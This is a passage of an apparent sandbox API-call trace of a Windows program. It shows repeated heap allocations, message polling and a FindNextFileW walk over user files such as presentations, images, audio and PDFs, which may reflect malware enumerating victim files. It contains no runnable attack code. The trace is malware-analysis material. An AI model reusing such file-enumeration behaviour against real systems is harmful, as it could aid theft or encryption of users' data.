Size=0x10) returned 0x2e53ad0 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0217.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0217.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0217.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.143] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.143] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.143] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda3b0440, ftCreationTime.dwHighDateTime=0x1d5e0de, ftLastAccessTime.dwLowDateTime=0xf9871240, ftLastAccessTime.dwHighDateTime=0x1d5e7ea, ftLastWriteTime.dwLowDateTime=0xf9871240, ftLastWriteTime.dwHighDateTime=0x1d5e7ea, nFileSizeHigh=0x0, nFileSizeLow=0x7128, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2eFopJKn6uustHoKg.pps", cAlternateFileName="E2EFOP~1.PPS")) returned 1 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0217.144] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0217.144] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0217.144] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0217.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.145] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0217.145] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.145] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafc9f30, ftCreationTime.dwHighDateTime=0x1d5ed64, ftLastAccessTime.dwLowDateTime=0xe0f48730, ftLastAccessTime.dwHighDateTime=0x1d5e56f, ftLastWriteTime.dwLowDateTime=0xe0f48730, ftLastWriteTime.dwHighDateTime=0x1d5e56f, nFileSizeHigh=0x0, nFileSizeLow=0x7028, dwReserved0=0x0, dwReserved1=0x0, cFileName="EdsWI8rB4BywDqnX6.bmp", cAlternateFileName="EDSWI8~1.BMP")) returned 1 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.145] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0217.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.145] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.146] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.146] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0217.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0217.146] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0217.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.147] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527619d0, ftCreationTime.dwHighDateTime=0x1d5ea81, ftLastAccessTime.dwLowDateTime=0x7f6ccad0, ftLastAccessTime.dwHighDateTime=0x1d5e1c9, ftLastWriteTime.dwLowDateTime=0x7f6ccad0, ftLastWriteTime.dwHighDateTime=0x1d5e1c9, nFileSizeHigh=0x0, nFileSizeLow=0x2479, dwReserved0=0x0, dwReserved1=0x0, cFileName="eeVXHty18.mp3", cAlternateFileName="EEVXHT~1.MP3")) returned 1 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.147] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.147] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.147] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0217.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.148] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.148] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.148] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd49fe790, ftCreationTime.dwHighDateTime=0x1d5ee3e, ftLastAccessTime.dwLowDateTime=0xd494fa00, ftLastAccessTime.dwHighDateTime=0x1d5e97b, ftLastWriteTime.dwLowDateTime=0xd494fa00, ftLastWriteTime.dwHighDateTime=0x1d5e97b, nFileSizeHigh=0x0, nFileSizeLow=0xd640, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQBMxAkSv-.pdf", cAlternateFileName="EQBMXA~1.PDF")) returned 1 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0217.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0217.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.149] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0217.150] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.150] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0217.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0217.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.151] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0217.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0217.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0217.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0217.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.151] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0217.152] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0217.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0217.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0217.152] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4482d20, ftCreationTime.dwHighDateTime=0x1d5ed38, ftLastAccessTime.dwLowDateTime=0xc3394820, ftLastAccessTime.dwHighDateTime=0x1d5e6c3, ftLastWriteTime.dwLowDateTime=0xc3394820, ftLastWriteTime.dwHighDateTime=0x1d5e6c3, nFileSizeHigh=0x0, nFileSizeLow=0x3baa, dwReserved0=0x0, dwReserved1=0x0, cFileName="FDKSrtwPMRhz2PyeAx.gif", 